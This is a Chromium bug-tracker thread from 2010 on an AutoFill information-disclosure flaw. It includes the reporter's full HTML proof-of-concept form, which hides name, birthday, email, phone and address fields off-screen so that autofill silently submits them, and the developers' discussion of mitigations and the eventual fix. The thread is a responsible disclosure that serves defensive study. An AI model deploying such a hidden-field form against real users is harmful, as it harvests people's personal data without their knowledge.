New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 8 users
Status: Fixed
Owner:
Closed: Jul 2010
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 2
Type: Bug-Security
M-6

Blocking:
issue 48466

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
"AutoFill Profiles"-feature information disclosure issue
Reported by florian....@gmail.com, Mar 22 2010 Back to list
Chrome Version       : 5.0.360.0 (42215)
URLs (if applicable) : http://0x7c.de/form_en.php

During some tests of Chrome's new "AutoFill Profiles" feature for Addresses
I discovered a simple way to submit all information of the user's personal
information, although the user might think he just entered and submitted
his first name using the autofill feature for Addresses.

For this purpose I crafted a html web page containing a simple feedback
form. In this form an user can type in his first name, rate the page and
give some short feedback. If the user begins to enter his real first name
(which is not uncommon) Chrome's autofill feature for Addresses comes in
place and suggests to autocomplete the user's first name, if the user saved
some personal information in the "AutoFill Profiles"-option. If the user
selects his first name the field will be filled as expected and the user
can continue to fill in the other input fields of my demo web page. If the
user hits the <SUBMIT>-button the feedback will be posted to the server and
(in this case) shows the submitted data.

In first instance this seems not critical, but the "magic" happens behind
the scenes. The form does not only contain a field for the user's first
name, it also contains fields for his phone number, email, address, etc.
But these fields were hidden using CSS and thus the user does not see that
these fields were automatically filled with his personal information.

I think that Chrome should prompt the user, *if* and especially *what*
personal data of the "AutoFill Profiles"-option were automatically filled
into a web page's form fields. So the user can decide, if he wants to
submit this information or not.

If you want to test my simple PoC, just enter http://0x7c.de/form_en.php

If you have any questions or comments, feel free to contact me.

Best regards,
Florian
 
Labels: Feature-Autofill
Status: Untriaged
thanks for the report.
CCing skylined to decide about the security implications
Labels: Security SecSeverity-Medium Area-UI UI-Needed
Nice find. It's hard to say what the impact is, as it depends on the user: you can 
argue that when you allow auto-fill, you are basically giving away *all* the 
information your provided to that site (even though this is not immediately visible, 
as in this case). However, you can also argue that because the information is not 
visible, users may not realize they are giving out this information. IMHO, the first 
option would mean sec-severity-none. The second options would be sec-severity-high. 
Marking as medium until we hear an argument for one or the other. cc-ing more 
security people for a second oppinion.

It is impossible to determine which parts of a form are clearly visible, as "clearly 
visible" is not clearly defined. That means we cannot detect this and warn the user.

I think we will need to involve the UI people to figure out what we can do to educate 
or warn the user. Maybe the best thing is to replace the webform with some UI we 
control that clearly shows which information the site is asking and allows the user 
to select which information s/he want to use from auto-fill, for instance through a 
popup, which is opened when the user chooses to use auto-fill. This can have a 
"always use these values for this site" option, to prevent annoying the user and/or 
train them to click "OK" everytime.
cc-ing chris and michal as promised; guys, what is your take on this?
How do other browsers behave here?
It's unclear to me what level of user interaction has to occur before autofill data is 
given to random domain X?
I agree with you -- it is hard to decide which parts of a form are visible due to the
huge amount of html/css styling "tricks" that could be used. Well, I thought of an
opt-in where the user can enable some sort of "golden bar" that appears, if the
"AutoFill Profiles"-option comes in place. I think message boxes etc. just annoy
people as you said. The "golden bar" could inform/educate the user in first place and
e.g. give an additional option to list up the auto-filled personal information.

>How do other browsers behave here?

Firefox and Opera are not affected, but Safari "struggles" with the same problem and
fills out the forms with information taken from the personal virtual business card. I
informed Apple's security team about this issue.
Labels: OS-All
Labels: -Area-Undefined Mstone-X
Comment 8 Deleted
Adding Thomas per Florian's request, in case we decide to limit access to this bug.
Comment 10 by brian@chromium.org, Mar 24 2010
Labels: -UI-Needed
It's probably a good idea to see what Toolbar does in this case. zel probably knows. I 
don't think we need the UI-needed label here. 
Status: Started
looking into this.
Labels: Restrict-View-SecurityTeam
Hi Florian,

The url testcase http://0x7c.de/form_en.php looks down. If you own the site, can you
please bring it back up and/or attach the form_en.php file used.

Unfortunately I don't have access to the php file from here (at home), but I can give 
you some early html-version (do not get irritated, some parts are in german and the 
code is really bad ;)

------8<-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> 
<html> 
<head> 
	<title>Eine kleine, anonyme Umfrage</title> 
</head> 
<body> 
 
<center><img src=hello.png></center> 
<h3>Wie hat Ihnen diese Web-Seite gefallen?</h3> 
<form method="post" action="/form.php"> 
<table> 
<tr> 
   <td>Vorname:</td> 
   <td><input type=text name=name size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Nachname:</td> 
   <td><input type=text name=lastname size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Vorname:</td> 
   <td><input type=text name=firstname size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Geburtstag:</td> 
   <td><input type=text name=birthday size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Meine E-Mail:</td> 
   <td><input type=text name=email size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Meine Telefonnummer:</td> 
   <td><input type=text name=phone size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Meine Mobilnummer:</td> 
   <td><input type=text name=mobile size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Adresse:</td> 
   <td><input type=text name=address size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>PLZ:</td> 
   <td><input type=text name=zip size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Stadt:</td> 
   <td><input type=text name=city size=50></td> 
</tr> 
<tr style="position:absolute; bottom:-100px; left:-100px;"> 
   <td>Land:</td> 
   <td><input type=text name=country size=50></td> 
</tr> 
<tr> 
   <td>Bewertung:</td> 
   <td> 
   1<input type="radio" name="rank" value="1" > 
   2<input type="radio" name="rank" value="2" checked> 
   3<input type="radio" name="rank" value="3" > 
   4<input type="radio" name="rank" value="4" > 
   5<input type="radio" name="rank" value="5" > 
   (Schulnoten)
   </td> 
</tr> 
<tr> 
   <td valign=top>Nachricht:</td> 
   <td> 
   <textarea cols="30" rows="6" name="message">Ihre
    Nachricht...</textarea> 
   </td> 
</tr> 
<tr> 
   <td>Wie sind Sie auf die Web-<br>Seite aufmerksam geworden?</td> 
   <td> 
   <select size="1" name="learnedof"> 
   <option value="zeitschrift">Zeitschrift
   <option value="google">Google-Suche (Ad-Words)
   <option value="online">Online
   <option value="friends">Empfehlung eines Freundes
   <option value="anders">Zufall (einfach so)
   </select> 
   </td> 
</tr> 
<tr> 
   <td></td> 
   <td> 
   <input type="submit" value="Absenden"> 
   <input type="reset"> 
   <input type="hidden" name="sent" value="1"> 
   </td> 
</tr> 
</table> 
</form><img src="aaa.gif" height="120" width="800" style="position:absolute; bottom:-
100px; left:-100px;"> 
</body> 
</html> 
------8<-----
Thanks a lot Florian for your quick response. I am also working out some more
testcases to analyze our autofill behavior in detail.
form_en.php attached right now...
form_en.php
2.8 KB View Download
Thanks Florian for this bug. I am able to successfully reproduce the problem. As far
i have seen (still analyzing), we are not autofilling anything until there is an
explicit user interaction in which user explicitly types something that matches name
and then selects it from the "Name (Label Name)" drop-down. I do understand that
there can be hidden elements, so an attacker can make all elements hidden except the
name, and then wait for the user to select it from dropdown. user will not
notice/think that any other info is being filled in. in fact, there is no reliable
way to detect that.

One solution could be prompt user (via yellow bar) that his information is filled in.
this will add another interaction mechanism. so, user will be required to first
select something from dropdown and then say yes to the yellow bar prompt. i think
this may become a burden for user and defeat the purpose of autofill.

However, there is another solution that i thought, which is warn the user by adding
something like "Name (Label Name): Warning! Selecting this will release your personal
information to this website" in the drop down box itself. this way, number of user
interaction sticks to 1 and we did warn user before selecting it.

How does this solution sound to everyone. if everyone is fine, i will go ahead with
writing a patch.

just a fyi, i could not test credit card functionality since it is currently in
development and will be available soon. however, i don't think cc autofill is any
different from address autofill. 
inferno: Please do not make this change.  If anything this information should be added 
to the "Learn more" link on the AutoFill infobar.  This link does not currently exist.
Thanks James for discussing this over phone and letting me know about the upcoming
"Learn more" link option that will include this information. As we talked, please
include the UI leads in this discussion to see if anything could be done to prevent
user from falling prey to this attack.
inferno: Thanks for your feedback and comments about the issue. Well, in my opinion
the yellow/golden bar must not require to first select the fields that will be filled
out. I thought of a yellow bar (as an opt-out) that informs the user that more than
one field will/was automatically filled out. From there the user has the choice to
view a list of the autofilled data and e.g. undo the autofill. The basic yellow bar
could look like this:

----------------------------------------------------------------------------
Autofill applied on 6 fields out of 9 existing fields. Click (here) to see autofilled
data         |X|
----------------------------------------------------------------------------

If the user clicks on (here), Chrome lists the 6 autofilled fields and the user might
undo it.

Best regards, Florian.
Hi Florian,

Thanks for discussing this in more detail. "Undo the autofill" solution has an issue.
Attacker can steal the data by monitoring the DOM and as soon as the data is
autofilled, will make it sent to his/her evil server. We are looking for ways to warn
user before his/her personal information gets autofilled. Also, please note that
autofill functionality is not yet complete. If you have any other ideas, please feel
free to share with us. we will keep you updated on this issue.

Warm Regards,
Inferno
>Attacker can steal the data by monitoring the DOM

Sorry, I missed that... undoing the whole thing afterwards makes no sense.

I followed up your idea about informing/educating the user and played around with
some UI-designs, see attachments (just some ideas...).

1) The classic yellow/golden bar

Just a yellow bar that informs the user. If the user moves the mouse over the 8 a
little "hover"-box might appear that shows the 8 field-names and the information that
will be filled in. If the user clicks on (Learn more...) he/she will be directed to a
help-site that explains the autofill-feature in more detail and make him/her aware of
the information disclosure problem.

2) yellow/golden bar in the autofill-choice-box

My second draft proposal seems to be a little more complicated and might confuse an
user, but I post it anyhow: I thought of a yellow bar in the autofill-choice-box
itself. The user can choose from different types of ways to autofill the forms:

a) fill out just the field selected,
b) fill out all fields matching the pre-saved autofill data, and
c) fill out the fields with custom choice.

Well, to me the second solution seems to be a bit complicated. Any comment is
appreciated.

Regards, Florian
02.png
8.7 KB View Download
01.png
10.8 KB View Download
Re comment 20: IIRC we already have code to "secretly" fill in a field without the 
DOM changing or JavaScript being able to read it. I think we use it for password auto 
fill; it only gets filled in for real when you submit the form. Not entirely sure 
about this though.

Ideally, I'd like to show the user exactly what is being sent to the site, in other 
words, when autofill takes place, we show the user the values that are being entered. 
I think users will not notice popups, goldbars, etc, if they contain generic 
messages, such as "We will fill in your name and address". But when they see their 
own name and address, as in "We will fill in 'John Smith', 'Beverly hills 90210'", 
they may pay more attention.
Isn't it a little late at that point if we notify the user that we just sent their 
credit card info to a potentially malicious site?
Yes, what I meant is: we should show the user all the information that is being autofilled at some point 
before it gets sent to the site.
That requires the user to verify the information for every autofill, which adds 
another click to the process, not to mention cognitive recognition of the data in 
infobar compared to the forms that are visible in the page.  This is like any infobar 
or message box; the user will eventually instinctively press 'Ok' without reading the 
data.
Update: We're fixing this issue in a few ways.  First we're segregating profile 
filling from credit card filling.  In addition, we're make it so that credit card 
autofill can only be initiated from the credit card # field.  That way a malicious 
site can't trick the user into entering a name field that is actually the 'Name on 
card' field with the other credit card fields hidden.  In the M6 timeline, we plan to 
mock up a new design for the AutoFill dropdown that incorporates right-aligned icons 
(similar to the omnibox) that show the user that profile info and/or credit card info 
will be autofilled if the user completes the AutoFill operation.
Labels: -Mstone-X Mstone-6
Status: Assigned
James, any updates on this bug ?
Labels: ReleaseBlock-Stable
Blockedon: 48466
 Bug 48466  will be tracking the overall security audit progress for autofill.
 Issue 48591  has been merged into this issue.
Blockedon: -48466
Status: Started
Since this bug is already public, lets try to add this as part of fix (suggestion from Michal)
-----
The only thing we can do without overly complicating stuff is to
make sure that suggest lists are always shown on top of any other UI
elements, so that the user gets some visual warning. Refusing to
autocomplete when element is partly obscured is probably not very
feasible.
------

RT @lavakumark: Stealing AutoFill Google Chrome(Win)based on Safari bug http://bit.ly/cWUVOG Vid http://youtu.be/1Vc0GMDX52w < any1 confirm?
Status: Fixed
ToT now has CC icons and non-limited width popups.
James, i don't think you fixed comment #36. if you want to handle it in a different bug, can you please file a new security bug. the poc for this is public, it will be good to fix it.
As far as I know, the popup is always on top. Have you seen otherwise?
James, i am in the blackhat conf, so cant check since my vpn is too slow. can you please check the poc in comment #36. i saw the youtube video (after the poc link) and i didn't see the popup coming on top.
Ok, i checked in the POC in comment #36. the drop-down values came on top, when you press the first enter. then when you press enter again, it gets selected. i dont see this as an issue since user interaction is required and user's data is clearly show on top on the false image. so, lets keep this in fixed.
verified in 6.0.484.0 (54565).
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify
Labels: Type-Security
Labels: SecImpacts-None
Batch update: fuzzily determined that this security bug did not affect a stable release.
Cc: agektmr@google.com
proof of concept video of click jacking
https://plus.google.com/112675818324417081103/posts/PGFmNinuVmv

I think we should raise severity of this issue.
This is not clickjacking and not a convincing phishing attack at all.
Reasons being
1. Autofill popup shows clearly on top.
2. First entry is your credit card entry followed by a clear credit
card logo image.

We got all these mitigations in when we were auditing AutoFill for Chrome 6.

Cc: bulkne...@gmail.com
Labels: -Restrict-View-SecurityNotify
Lifting view restrictions.
Project Member Comment 52 by bugdroid1@chromium.org, Oct 13 2012
Blocking: -chromium:48466 chromium:48466
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 53 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Feature-Autofill -SecSeverity-Medium -Area-UI -Mstone-6 -Type-Security -SecImpacts-None M-6 Security-Severity-Medium Cr-UI Security-Impact-None Type-Bug-Security Cr-UI-Browser-Autofill
Project Member Comment 54 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Project Member Comment 55 by bugdroid1@chromium.org, Mar 21 2013
Labels: Security_Severity-None
Project Member Comment 56 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-None Security_Impact-None
Project Member Comment 57 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-Medium -Security_Severity-None Security_Severity-Medium
Comment 58 by laforge@google.com, Jul 24 2013
Cc: -jeffreyc@chromium.org
Project Member Comment 59 by sheriffbot@chromium.org, Jun 22 2016
Labels: -ReleaseBlock-Stable
Project Member Comment 60 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 61 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment